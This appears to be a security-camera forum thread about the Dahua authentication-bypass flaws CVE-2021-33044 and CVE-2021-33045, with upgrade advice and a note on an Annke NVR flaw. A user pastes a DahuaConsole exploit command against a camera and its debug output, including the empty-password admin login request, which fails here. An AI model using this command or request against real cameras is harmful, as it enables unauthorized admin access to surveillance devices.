FYI
Dahua CVE-2021-33044; CVE-2021-33045
My initial release will be on Sept 6, and later FD on Oct 6.
Dahua CVE-2021-33044; CVE-2021-33045
My initial release will be on Sept 6, and later FD on Oct 6.
Cool stuff, both these CVE will not give you RCE, but will give you Admin access to device if not using fixed FW, you should upgrade soonest. If no new FW can be found for your device one Dahua website (like many of my own), you should defiantly contact Dahua support and do official complain.It seems to be the season for severe vulnerabilities being disclosed.
The Annke one was also pretty bad -
Annke N48PBB NVR vulnerability
If you have one of these on the Internet you might want to update. And reconsider having any IoT exposed to the internet in the first place :) https://www.nozominetworks.com/blog/new-annke-vulnerability-shows-risks-of-iot-security-camera-systems/ipcamtalk.com
/DahuaConsole# ./Console.py --logon loopback --rhost 172.16.0.10 --rport 80 -d
[*] [Dahua Debug Console 2019-2021 bashis <mcw noemail eu>]
[*] logon type "loopback" with proto "dhip" at 172.16.0.10:80
[+] Opening connection to 172.16.0.10 on port 80: Done
[-] Dahua Debug Console: Failed
[-] Login: global.login [random]
[BEGIN SEND (172.16.0.10)] <------------------1801------------------>
20000000|44484950|00000000|00000000|91000000|00000000|91000000|00000000
{"method": "global.login", "params": {"userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct"}, "id": 0, "session": 0}
[ END SEND (172.16.0.10)] <------------------1801------------------>
[*] Closed connection to 172.16.0.10 port 80
[-] [p2p] EOFError()
[*] All done
Noted you missing the TCP/37777 port, sure it is Dahua clone?Hi. I tried DahuaConsole on some Alibi Security clones of Dahua cameras but was unsuccessful. The only ports that nmap reports are: 80, 81, 85, 554, 5060, and 49152.
Of the examples on the Github, this was the only one that could connect to the camera. Does the p2p EOF error mean that the exploit won't work on my camera?Code:/DahuaConsole# ./Console.py --logon loopback --rhost 172.16.0.10 --rport 80 -d [*] [Dahua Debug Console 2019-2021 bashis <mcw noemail eu>] [*] logon type "loopback" with proto "dhip" at 172.16.0.10:80 [+] Opening connection to 172.16.0.10 on port 80: Done [-] Dahua Debug Console: Failed [-] Login: global.login [random] [BEGIN SEND (172.16.0.10)] <------------------1801------------------> 20000000|44484950|00000000|00000000|91000000|00000000|91000000|00000000 {"method": "global.login", "params": {"userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct"}, "id": 0, "session": 0} [ END SEND (172.16.0.10)] <------------------1801------------------> [*] Closed connection to 172.16.0.10 port 80 [-] [p2p] EOFError() [*] All done
Thanks
Hi mate,FYI
Dahua CVE-2021-33044; CVE-2021-33045
My initial release will be on Sept 6, and later FD on Oct 6.